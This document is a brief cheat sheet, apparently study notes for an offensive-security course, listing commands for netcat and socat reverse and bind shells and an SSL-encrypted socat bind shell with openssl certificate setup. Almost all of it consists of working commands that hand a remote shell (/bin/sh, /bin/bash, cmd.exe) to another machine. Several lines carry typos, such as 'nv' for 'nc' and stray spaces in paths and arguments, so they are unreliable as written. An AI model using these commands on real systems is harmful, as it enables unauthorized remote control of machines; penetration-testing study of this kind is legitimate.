-------------------------------------------------------------------

** Netcat reverse shell **

Remote machine:
$ nc -nv local_machine_ip 4444 -e /bin/sh

Local machine
$ nv -nvlp 4444 

-------------------------------------------------------------------

** Netcat bind shell **

Remote machine:
C:\Users\offsec> nc -nlvp 4444 -e cmd.exe

Local machine
$nc -nv remote_machine_ip 4444

-------------------------------------------------------------------

** Socat bind shell

Remote machine
$ socat TCP-LISTEN:4444 EXEC:/bin/sh

Local machine
$ socat - TCP4:remote_machine_ip:4444

-------------------------------------------------------------------

** Socat Reverse shell

Local machine
$ socat -d -d TCP-LISTEN:4444 STDOUT

Remote machine
$ socat TCP4:remote_machine_ip:4444 EXEC:/bin/bash

-------------------------------------------------------------------

** SSL Socat bind shell

Listener machine

- Create self-signed cert and key
$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt

- Combine key and cert into a single .pem file:
$ cat bind_shell.key bind_shell.crt > bind_shell.pem

- Listen for connections
$ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash

Client machine
$ socat - OPENSSL:remote_ip:443,verify=0

-------------------------------------------------------------------




